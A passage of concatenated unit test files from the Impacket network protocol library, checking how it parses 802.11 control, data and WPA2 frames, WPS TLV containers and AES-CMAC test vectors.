37 | self.assertEqual(self.ack.get_header_size(), 8)
38 | self.assertEqual(self.ack.get_tail_size(), 0)
39 |
40 | def test_02_Duration(self):
41 | 'Test Duration field'
42 |
43 | self.assertEqual(self.ack.get_duration(), 0)
44 | self.ack.set_duration(0x1234)
45 | self.assertEqual(self.ack.get_duration(), 0x1234)
46 |
47 | def test_03_RA(self):
48 | 'Test RA field'
49 |
50 | ra=self.ack.get_ra()
51 | self.assertEqual(ra.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85])
52 | ra[0]=0x12
53 | ra[5]=0x34
54 | self.ack.set_ra(ra)
55 | self.assertEqual(self.ack.get_ra().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34])
56 |
57 |
58 | if __name__ == '__main__':
59 | unittest.main(verbosity=1)
60 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlCFEnd.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEnd
12 |
13 |
14 | class TestDot11FrameControlCFEnd(unittest.TestCase):
15 |
16 | def setUp(self):
17 | # 802.11 Control Frame CFEnd
18 | self.frame_orig=b'\xe4\x00\x00\x00\xff\xff\xff\xff\xff\xff\x00\x19\xe0\x98\x04\xd4\xad\x9c\x3c\xc0'
19 |
20 | d = Dot11(self.frame_orig)
21 |
22 | type = d.get_type()
23 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL)
24 |
25 | subtype = d.get_subtype()
26 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END)
27 |
28 | typesubtype = d.get_type_n_subtype()
29 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END)
30 |
31 | self.cfend = Dot11ControlFrameCFEnd(d.get_body_as_string())
32 |
33 | d.contains(self.cfend)
34 |
35 | def test_01_HeaderTailSize(self):
36 | 'Test Header and Tail Size field'
37 | self.assertEqual(self.cfend.get_header_size(), 14)
38 | self.assertEqual(self.cfend.get_tail_size(), 0)
39 |
40 | def test_02_Duration(self):
41 | 'Test Duration field'
42 |
43 | self.assertEqual(self.cfend.get_duration(), 0x00)
44 | self.cfend.set_duration(0x1234)
45 | self.assertEqual(self.cfend.get_duration(), 0x1234)
46 |
47 | def test_03_RA(self):
48 | 'Test RA field'
49 |
50 | ra=self.cfend.get_ra()
51 | self.assertEqual(ra.tolist(), [0xff,0xff,0xff,0xff,0xff,0xff])
52 | ra[0]=0x12
53 | ra[5]=0x34
54 | self.cfend.set_ra(ra)
55 | self.assertEqual(self.cfend.get_ra().tolist(), [0x12,0xff,0xff,0xff,0xff,0x34])
56 |
57 | def test_04_BSSID(self):
58 | 'Test BSS ID field'
59 |
60 | bssid=self.cfend.get_bssid()
61 | self.assertEqual(bssid.tolist(), [0x00,0x19,0xe0,0x98,0x04,0xd4])
62 | bssid[0]=0x12
63 | bssid[5]=0x34
64 | self.cfend.set_bssid(bssid)
65 | self.assertEqual(self.cfend.get_bssid().tolist(), [0x12,0x19,0xe0,0x98,0x04,0x34])
66 |
67 |
68 | if __name__ == '__main__':
69 | unittest.main(verbosity=1)
70 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlCFEndCFACK.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEndCFACK
12 |
13 |
14 | class TestDot11FrameControlCFEndCFACK(unittest.TestCase):
15 |
16 | def setUp(self):
17 | # 802.11 Control Frame CFEndCFACK
18 | self.frame_orig=b'\xf4\x74\xde\xed\xe5\x56\x85\xf8\xd2\x3b\x96\xae\x0f\xb0\xd9\x8a\x03\x02\x38\x00'
19 |
20 | d = Dot11(self.frame_orig)
21 |
22 | type = d.get_type()
23 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL)
24 |
25 | subtype = d.get_subtype()
26 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK)
27 |
28 | typesubtype = d.get_type_n_subtype()
29 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END_CF_ACK)
30 |
31 | self.cfendcfack = Dot11ControlFrameCFEndCFACK(d.get_body_as_string())
32 |
33 | d.contains(self.cfendcfack)
34 |
35 | def test_01_HeaderTailSize(self):
36 | 'Test Header and Tail Size field'
37 | self.assertEqual(self.cfendcfack.get_header_size(), 14)
38 | self.assertEqual(self.cfendcfack.get_tail_size(), 0)
39 |
40 | def test_02_Duration(self):
41 | 'Test Duration field'
42 |
43 | self.assertEqual(self.cfendcfack.get_duration(), 0xEDDE)
44 | self.cfendcfack.set_duration(0x1234)
45 | self.assertEqual(self.cfendcfack.get_duration(), 0x1234)
46 |
47 | def test_03_RA(self):
48 | 'Test RA field'
49 |
50 | ra=self.cfendcfack.get_ra()
51 | self.assertEqual(ra.tolist(), [0xe5,0x56,0x85,0xf8,0xd2,0x3b])
52 | ra[0]=0x12
53 | ra[5]=0x34
54 | self.cfendcfack.set_ra(ra)
55 | self.assertEqual(self.cfendcfack.get_ra().tolist(), [0x12,0x56,0x85,0xf8,0xd2,0x34])
56 |
57 | def test_04_BSSID(self):
58 | 'Test BSS ID field'
59 |
60 | bssid=self.cfendcfack.get_bssid()
61 | self.assertEqual(bssid.tolist(), [0x96,0xae,0x0f,0xb0,0xd9,0x8a])
62 | bssid[0]=0x12
63 | bssid[5]=0x34
64 | self.cfendcfack.set_bssid(bssid)
65 | self.assertEqual(self.cfendcfack.get_bssid().tolist(), [0x12,0xae,0x0f,0xb0,0xd9,0x34])
66 |
67 |
68 | if __name__ == '__main__':
69 | unittest.main(verbosity=1)
70 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlCTS.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11ControlFrameCTS
12 |
13 |
14 | class TestDot11FrameControlCTS(unittest.TestCase):
15 |
16 | def setUp(self):
17 | # 802.11 Control Frame CTS
18 | self.frame_orig=b'\xc4\x00\x3b\x12\x00\x19\xe0\x98\x04\xd4\x2b\x8a\x65\x17'
19 |
20 | d = Dot11(self.frame_orig)
21 |
22 | type = d.get_type()
23 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL)
24 |
25 | subtype = d.get_subtype()
26 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND)
27 |
28 | typesubtype = d.get_type_n_subtype()
29 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CLEAR_TO_SEND)
30 |
31 | self.cts = Dot11ControlFrameCTS(d.get_body_as_string())
32 |
33 | d.contains(self.cts)
34 |
35 | def test_01_HeaderTailSize(self):
36 | 'Test Header and Tail Size field'
37 | self.assertEqual(self.cts.get_header_size(), 8)
38 | self.assertEqual(self.cts.get_tail_size(), 0)
39 |
40 | def test_02_Duration(self):
41 | 'Test Duration field'
42 |
43 | self.assertEqual(self.cts.get_duration(), 4667)
44 | self.cts.set_duration(0x1234)
45 | self.assertEqual(self.cts.get_duration(), 0x1234)
46 |
47 | def test_03_RA(self):
48 | 'Test RA field'
49 |
50 | ra=self.cts.get_ra()
51 |
52 | self.assertEqual(ra.tolist(), [0x00,0x19,0xe0,0x98,0x04,0xd4])
53 | ra[0]=0x12
54 | ra[5]=0x34
55 | self.cts.set_ra(ra)
56 | self.assertEqual(self.cts.get_ra().tolist(), [0x12,0x19,0xe0,0x98,0x04,0x34])
57 |
58 |
59 | if __name__ == '__main__':
60 | unittest.main(verbosity=1)
61 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlPSPoll.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11ControlFramePSPoll
12 |
13 |
14 | class TestDot11FrameControlPSPoll(unittest.TestCase):
15 |
16 | def setUp(self):
17 | # 802.11 Control Frame PSPoll
18 | self.frame_orig=b'\xa6\x73\xf1\xaf\x48\x06\xee\x23\x2b\xc9\xfe\xbe\xe5\x05\x4c\x0a\x04\xa0\x00\x0f'
19 |
20 | d = Dot11(self.frame_orig)
21 |
22 | type = d.get_type()
23 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL)
24 |
25 | subtype = d.get_subtype()
26 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL)
27 |
28 | typesubtype = d.get_type_n_subtype()
29 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL)
30 |
31 | self.pspoll = Dot11ControlFramePSPoll(d.get_body_as_string())
32 |
33 | d.contains(self.pspoll)
34 |
35 | def test_01_HeaderTailSize(self):
36 | 'Test Header and Tail Size field'
37 | self.assertEqual(self.pspoll.get_header_size(), 14)
38 | self.assertEqual(self.pspoll.get_tail_size(), 0)
39 |
40 | def test_02_AID(self):
41 | 'Test AID field'
42 |
43 | self.assertEqual(self.pspoll.get_aid(), 0xAFF1)
44 | self.pspoll.set_aid(0x1234)
45 | self.assertEqual(self.pspoll.get_aid(), 0x1234)
46 |
47 | def test_03_BSSID(self):
48 | 'Test BSS ID field'
49 |
50 | bssid=self.pspoll.get_bssid()
51 | self.assertEqual(bssid.tolist(), [0x48,0x06,0xee,0x23,0x2b,0xc9])
52 | bssid[0]=0x12
53 | bssid[5]=0x34
54 | self.pspoll.set_bssid(bssid)
55 | self.assertEqual(self.pspoll.get_bssid().tolist(), [0x12,0x06,0xee,0x23,0x2b,0x34])
56 |
57 | def test_04_TA(self):
58 | 'Test TA field'
59 |
60 | ta=self.pspoll.get_ta()
61 | self.assertEqual(ta.tolist(), [0xfe,0xbe,0xe5,0x05,0x4c,0x0a])
62 | ta[0]=0x12
63 | ta[5]=0x34
64 | self.pspoll.set_ta(ta)
65 | self.assertEqual(self.pspoll.get_ta().tolist(), [0x12,0xbe,0xe5,0x05,0x4c,0x34])
66 |
67 |
68 | if __name__ == '__main__':
69 | unittest.main(verbosity=1)
70 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlRTS.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11, Dot11Types, Dot11ControlFrameRTS
12 |
13 |
14 | class TestDot11FrameControlRTS(unittest.TestCase):
15 |
16 | def setUp(self):
17 | # 802.11 Control Frame RTS
18 | self.frame_orig=b'\xb4\x00\x81\x01\x00\x08\x54\xac\x2f\x85\x00\x23\x4d\x09\x86\xfe\x99\x75\x43\x73'
19 |
20 | d = Dot11(self.frame_orig)
21 |
22 | type = d.get_type()
23 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL)
24 |
25 | subtype = d.get_subtype()
26 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND)
27 |
28 | typesubtype = d.get_type_n_subtype()
29 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_REQUEST_TO_SEND)
30 |
31 | self.rts = Dot11ControlFrameRTS(d.get_body_as_string())
32 |
33 | d.contains(self.rts)
34 |
35 | def test_01_HeaderTailSize(self):
36 | 'Test Header and Tail Size field'
37 | self.assertEqual(self.rts.get_header_size(), 14)
38 | self.assertEqual(self.rts.get_tail_size(), 0)
39 |
40 | def test_02_Duration(self):
41 | 'Test Duration field'
42 |
43 | self.assertEqual(self.rts.get_duration(), 0x181)
44 | self.rts.set_duration(0x1234)
45 | self.assertEqual(self.rts.get_duration(), 0x1234)
46 |
47 | def test_03_RA(self):
48 | 'Test RA field'
49 |
50 | ra=self.rts.get_ra()
51 | self.assertEqual(ra.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85])
52 | ra[0]=0x12
53 | ra[5]=0x34
54 | self.rts.set_ra(ra)
55 | self.assertEqual(self.rts.get_ra().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34])
56 |
57 | def test_04_TA(self):
58 | 'Test TA field'
59 |
60 | ta=self.rts.get_ta()
61 | self.assertEqual(ta.tolist(), [0x00,0x23,0x4d,0x09,0x86,0xfe])
62 | ta[0]=0x12
63 | ta[5]=0x34
64 | self.rts.set_ta(ta)
65 | self.assertEqual(self.rts.get_ta().tolist(), [0x12,0x23,0x4d,0x09,0x86,0x34])
66 |
67 |
68 | if __name__ == '__main__':
69 | unittest.main(verbosity=1)
70 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameData.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11, Dot11Types, Dot11DataFrame
12 |
13 |
14 | class TestDot11DataFrames(unittest.TestCase):
15 |
16 | def setUp(self):
17 | # 802.11 Data Frame
18 | #
19 | self.frame_orig=b'\x08\x01\x30\x00\x00\x08\x54\xac\x2f\x85\x00\x23\x4d\x09\x86\xfe\x00\x08\x54\xac\x2f\x85\x40\x44\xaa\xaa\x03\x00\x00\x00\x08\x00\x45\x00\x00\x28\x72\x37\x40\x00\x80\x06\x6c\x22\xc0\xa8\x01\x02\xc3\x7a\x97\x51\xd7\xa0\x00\x50\xa5\xa5\xb1\xe0\x12\x1c\xa9\xe1\x50\x10\x4e\x75\x59\x74\x00\x00\xed\x13\x22\x91'
20 |
21 | d = Dot11(self.frame_orig)
22 |
23 | type = d.get_type()
24 | self.assertEqual(type,Dot11Types.DOT11_TYPE_DATA)
25 |
26 | subtype = d.get_subtype()
27 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_DATA)
28 |
29 | typesubtype = d.get_type_n_subtype()
30 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_DATA_SUBTYPE_DATA)
31 |
32 | self.data = Dot11DataFrame(d.get_body_as_string())
33 |
34 | d.contains(self.data)
35 |
36 | def test_01_HeaderSize(self):
37 | 'Test Header and Tail Size field'
38 | self.assertEqual(self.data.get_header_size(), 22)
39 | self.assertEqual(self.data.get_tail_size(), 0)
40 |
41 | def test_02_Duration(self):
42 | 'Test Duration field'
43 |
44 | self.assertEqual(self.data.get_duration(), 0x30)
45 | self.data.set_duration(0x1234)
46 | self.assertEqual(self.data.get_duration(), 0x1234)
47 |
48 | def test_03_Address_1(self):
49 | 'Test Address 1 field'
50 |
51 | addr=self.data.get_address1()
52 |
53 | self.assertEqual(addr.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85])
54 | addr[0]=0x12
55 | addr[5]=0x34
56 | self.data.set_address1(addr)
57 | self.assertEqual(self.data.get_address1().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34])
58 |
59 | def test_04_Address_2(self):
60 | 'Test Address 2 field'
61 |
62 | addr=self.data.get_address2()
63 |
64 | self.assertEqual(addr.tolist(), [0x00,0x23,0x4d,0x09,0x86,0xfe])
65 | addr[0]=0x12
66 | addr[5]=0x34
67 | self.data.set_address2(addr)
68 | self.assertEqual(self.data.get_address2().tolist(), [0x12,0x23,0x4d,0x09,0x86,0x34])
69 |
70 | def test_05_Address_3(self):
71 | 'Test Address 3 field'
72 |
73 | addr=self.data.get_address3()
74 |
75 | self.assertEqual(addr.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85])
76 | addr[0]=0x12
77 | addr[5]=0x34
78 | self.data.set_address3(addr)
79 | self.assertEqual(self.data.get_address3().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34])
80 |
81 | def test_06_sequence_control(self):
82 | 'Test Sequence control field'
83 | self.assertEqual(self.data.get_sequence_control(), 0x4440)
84 | self.data.set_sequence_control(0x1234)
85 | self.assertEqual(self.data.get_sequence_control(), 0x1234)
86 |
87 | def test_07_fragment_number(self):
88 | 'Test Fragment number field'
89 | self.assertEqual(self.data.get_fragment_number(), 0x0000)
90 | self.data.set_fragment_number(0xF1) # Es de 4 bit
91 | self.assertEqual(self.data.get_fragment_number(), 0x01)
92 |
93 | def test_08_sequence_number(self):
94 | 'Test Sequence number field'
95 | self.assertEqual(self.data.get_sequence_number(), 0x0444)
96 | self.data.set_sequence_number(0xF234) # Es de 12 bit
97 | self.assertEqual(self.data.get_sequence_number(), 0x0234)
98 |
99 | def test_09_frame_data(self):
100 | 'Test Frame Data field'
101 | # Test with packet without addr4
102 | frame_body=b"\xaa\xaa\x03\x00\x00\x00\x08\x00\x45\x00\x00\x28\x72\x37\x40\x00\x80\x06\x6c\x22\xc0\xa8\x01\x02\xc3\x7a\x97\x51\xd7\xa0\x00\x50\xa5\xa5\xb1\xe0\x12\x1c\xa9\xe1\x50\x10\x4e\x75\x59\x74\x00\x00"
103 | self.assertEqual(self.data.get_frame_body(), frame_body)
104 |
105 |
106 | if __name__ == '__main__':
107 | unittest.main(verbosity=1)
108 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_WPA2.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11DataFrame,Dot11WPA2,Dot11WPA2Data
12 |
13 |
14 | class TestDot11WPA2Data(unittest.TestCase):
15 |
16 | def setUp(self):
17 | # 802.11 Data Frame
18 | #
19 | self.frame_orig=b'\x08\x49\x24\x00\x00\x21\x29\x68\x33\x5d\x00\x15\xaf\xe4\xf1\x0f\x00\x21\x29\x68\x33\x5b\xe0\x31\x1b\x13\x00\x20\x00\x00\x00\x00\x84\x7d\x6a\x30\x8c\x60\x7e\x3b\x22\xdc\x16\xc1\x4b\x28\xd3\x26\x76\x9d\x2e\x59\x96\x31\x3e\x01\x6f\x61\xa2\x59\xc8\xdc\xd3\xc4\xad\x7c\xcc\x32\xa8\x9f\xf6\x03\x02\xe1\xac\x1d\x1e\x02\x8a\xcd\x5b\x94\x20\x2d\xfc\x6e\x37\x40\x2e\x46\x17\x19\x0c\xc0\x34\x07\xae\xe7\x77\xaf\xf9\x9f\x41\x53'
20 | d = Dot11(self.frame_orig)
21 |
22 | self.assertEqual(d.get_type(),Dot11Types.DOT11_TYPE_DATA)
23 | self.assertEqual(d.get_subtype(),Dot11Types.DOT11_SUBTYPE_DATA)
24 | self.assertEqual(d.get_type_n_subtype(),Dot11Types.DOT11_TYPE_DATA_SUBTYPE_DATA)
25 |
26 | data = Dot11DataFrame(d.get_body_as_string())
27 | d.contains(data)
28 |
29 | self.wpa2_header = Dot11WPA2(data.body_string)
30 | data.contains(self.wpa2_header)
31 |
32 | self.wpa2_data = Dot11WPA2Data(self.wpa2_header.body_string)
33 | self.wpa2_header.contains(self.wpa2_data)
34 |
35 | def test_01_is_WPA2(self):
36 | 'Test WPA2Header is_WPA2 method'
37 | self.assertEqual(self.wpa2_header.is_WPA2(), True)
38 |
39 | def test_03_extIV(self):
40 | 'Test WPA2Header extIV getter and setter methods'
41 | self.assertEqual(self.wpa2_header.get_extIV(), 0x01)
42 |
43 | self.wpa2_header.set_extIV(0x00) # Es de 1 bit
44 | self.assertEqual(self.wpa2_header.get_extIV(), 0x00)
45 |
46 | def test_04_keyid(self):
47 | 'Test WPA2Header keyID getter and setter methods'
48 | self.assertEqual(self.wpa2_header.get_keyid(), 0x00)
49 |
50 | self.wpa2_header.set_keyid(0x03) # Es de 2 bits
51 | self.assertEqual(self.wpa2_header.get_keyid(), 0x03)
52 |
53 | #TODO: Test get_decrypted_data
54 | #def test_05_get_decrypted_data(self):
55 |
56 | def test_06_PNs(self):
57 | 'Test WPA2Data PN0 to PN5 getter and setter methods'
58 | # PN0
59 | self.assertEqual(self.wpa2_header.get_PN0(), 0x1b)
60 | self.wpa2_header.set_PN0(0xAB)
61 | self.assertEqual(self.wpa2_header.get_PN0(), 0xAB)
62 |
63 | # PN1
64 | self.assertEqual(self.wpa2_header.get_PN1(), 0x13)
65 | self.wpa2_header.set_PN1(0xAB)
66 | self.assertEqual(self.wpa2_header.get_PN1(), 0xAB)
67 |
68 | # PN2
69 | self.assertEqual(self.wpa2_header.get_PN2(), 0x00)
70 | self.wpa2_header.set_PN2(0xAB)
71 | self.assertEqual(self.wpa2_header.get_PN2(), 0xAB)
72 |
73 | # PN3
74 | self.assertEqual(self.wpa2_header.get_PN3(), 0x00)
75 | self.wpa2_header.set_PN3(0xAB)
76 | self.assertEqual(self.wpa2_header.get_PN3(), 0xAB)
77 |
78 | # PN4
79 | self.assertEqual(self.wpa2_header.get_PN4(), 0x00)
80 | self.wpa2_header.set_PN4(0xAB)
81 | self.assertEqual(self.wpa2_header.get_PN4(), 0xAB)
82 |
83 | # PN5
84 | self.assertEqual(self.wpa2_header.get_PN5(), 0x00)
85 | self.wpa2_header.set_PN5(0xAB)
86 | self.assertEqual(self.wpa2_header.get_PN5(), 0xAB)
87 |
88 | def test_07_data(self):
89 | 'Test WPA2Data body'
90 | data=b'\x84\x7d\x6a\x30\x8c\x60\x7e\x3b\x22\xdc\x16\xc1\x4b\x28\xd3\x26\x76\x9d\x2e\x59\x96\x31\x3e\x01\x6f\x61\xa2\x59\xc8\xdc\xd3\xc4\xad\x7c\xcc\x32\xa8\x9f\xf6\x03\x02\xe1\xac\x1d\x1e\x02\x8a\xcd\x5b\x94\x20\x2d\xfc\x6e\x37\x40\x2e\x46\x17\x19'
91 | self.assertEqual(self.wpa2_data.body_string, data)
92 |
93 | def test_08_mic(self):
94 | 'Test WPA2Data MIC field'
95 | mic=b'\x0c\xc0\x34\x07\xae\xe7\x77\xaf'
96 | self.assertEqual(self.wpa2_data.get_MIC(), mic)
97 |
98 | mic=b'\x01\x02\x03\x04\xff\xfe\xfd\xfc'
99 | self.wpa2_data.set_MIC(mic)
100 | self.assertEqual(self.wpa2_data.get_MIC(), mic)
101 |
102 |
103 | if __name__ == '__main__':
104 | unittest.main(verbosity=1)
105 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_helper.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Tests for helper used to build ProtocolPackets
12 | #
13 | # Author:
14 | # Aureliano Calvo
15 | #
16 | import unittest
17 | import impacket.helper as h
18 |
19 |
20 | class TestHelpers(unittest.TestCase):
21 |
22 | def test_well_formed(self):
23 | class MockPacket(h.ProtocolPacket):
24 | byte_field = h.Byte(0)
25 | word_field = h.Word(1, ">")
26 | three_bytes_field = h.ThreeBytesBigEndian(3)
27 | long_field = h.Long(6, ">")
28 | aliased_bit_field = h.Bit(0,0)
29 |
30 | header_size = 4
31 | tail_size = 0
32 |
33 | p = MockPacket()
34 | p.byte_field = 1
35 | p.word_field = 2
36 | p.three_bytes_field = 4
37 | p.long_field = 8
38 |
39 | self.assertEqual(1, p.byte_field)
40 | self.assertEqual(2, p.word_field)
41 | self.assertEqual(4, p.three_bytes_field)
42 | self.assertEqual(8, p.long_field)
43 |
44 | self.assertEqual(True, p.aliased_bit_field)
45 |
46 | p.aliased_bit_field = False
47 |
48 | self.assertEqual(0, p.byte_field)
49 |
50 | self.assertEqual(p.get_packet(), MockPacket(p.get_packet()).get_packet()) # it is the same packet after reprocessing.
51 |
52 |
53 | if __name__ == '__main__':
54 | unittest.main(verbosity=1)
55 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_wps.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Tests for WPS packets
12 | #
13 | # Author:
14 | # Aureliano Calvo
15 | #
16 | import unittest
17 | import array
18 | from impacket import wps
19 |
20 |
21 | class TestTLVContainer(unittest.TestCase):
22 |
23 | def testNormalUsageContainer(self):
24 | BUILDERS={
25 | 1: wps.StringBuilder(),
26 | 2: wps.ByteBuilder(),
27 | 3: wps.NumBuilder(2)
28 | }
29 | tlvc = wps.TLVContainer(builders=BUILDERS)
30 |
31 | KINDS_N_VALUES = (
32 | (1, b"Sarlanga"),
33 | (2, 1),
34 | (3, 1024),
35 | (4, array.array("B", [1,2,3]))
36 | )
37 | for k,v in KINDS_N_VALUES:
38 | tlvc.append(k,v)
39 |
40 | tlvc2 = wps.TLVContainer(builders=BUILDERS)
41 | tlvc2.from_ary(tlvc.to_ary())
42 |
43 | for k,v in KINDS_N_VALUES:
44 | self.assertEqual(v, tlvc2.first(k))
45 |
46 | self.assertEqual(tlvc.to_ary(), tlvc2.to_ary())
47 | self.assertEqual(b"Sarlanga", tlvc.first(1))
48 |
49 |
50 | if __name__ == '__main__':
51 | unittest.main(verbosity=1)
52 |
--------------------------------------------------------------------------------
/impacket/tests/misc/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Copyright (C) 2023 Fortra. All rights reserved.
3 | #
4 | # This software is provided under under a slightly modified version
5 | # of the Apache Software License. See the accompanying LICENSE file
6 | # for more information.
7 | #
8 |
--------------------------------------------------------------------------------
/impacket/tests/misc/test_crypto.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | from __future__ import print_function, division
11 | import unittest
12 | from binascii import hexlify, unhexlify
13 |
14 | from impacket.crypto import Generate_Subkey, AES_CMAC, AES_CMAC_PRF_128
15 |
16 |
17 | def by8(s):
18 | return [s[i:i + 8] for i in range(0, len(s), 8)]
19 |
20 |
21 | def hex8(b):
22 | return ' '.join(by8(hexlify(b).decode('ascii')))
23 |
24 |
25 | def pp(prev, s):
26 | print(prev, end=' ')
27 | for c in by8(s):
28 | print(c, end=' ')
29 | # for i in range((len(s)//8)):
30 | # print("%s" % (s[:8]), end = ' ')
31 | # s = s[8:]
32 | print()
33 | return ''
34 |
35 |
36 | class CryptoTests(unittest.TestCase):
37 | def test_subkey(self):
38 | K = "2b7e151628aed2a6abf7158809cf4f3c"
39 | M = "6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e5130c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710" # noqa
40 |
41 | K1, K2 = Generate_Subkey(unhexlify(K))
42 | self.assertEqual(hex8(K1), 'fbeed618 35713366 7c85e08f 7236a8de')
43 | self.assertEqual(hex8(K2), 'f7ddac30 6ae266cc f90bc11e e46d513b')
44 |
45 | def test_AES_CMAC(self):
46 | K = "2b7e151628aed2a6abf7158809cf4f3c"
47 | M = "6bc1bee22e409f96e93d7e117393172aae2d8a571e03ac9c9eb76fac45af8e5130c81c46a35ce411e5fbc1191a0a52eff69f2445df4f9b17ad2b417be66c3710"
48 | # Example 1: len = 0
49 | self.assertEqual(hex8(AES_CMAC(unhexlify(K), unhexlify(M), 0)),
50 | 'bb1d6929 e9593728 7fa37d12 9b756746')
51 | # Example 2: len = 16
52 | self.assertEqual(hex8(AES_CMAC(unhexlify(K), unhexlify(M), 16)),
53 | '070a16b4 6b4d4144 f79bdd9d d04a287c')
54 | # Example 3: len = 40
55 | self.assertEqual(hex8(AES_CMAC(unhexlify(K), unhexlify(M), 40)),
56 | 'dfa66747 de9ae630 30ca3261 1497c827')
57 | # Example 3: len = 64
58 | self.assertEqual(hex8(AES_CMAC(unhexlify(K), unhexlify(M), 64)),
59 | '51f0bebf 7e3b9d92 fc497417 79363cfe')
60 | M = "eeab9ac8fb19cb012849536168b5d6c7a5e6c5b2fcdc32bc29b0e3654078a5129f6be2562046766f93eebf146b"
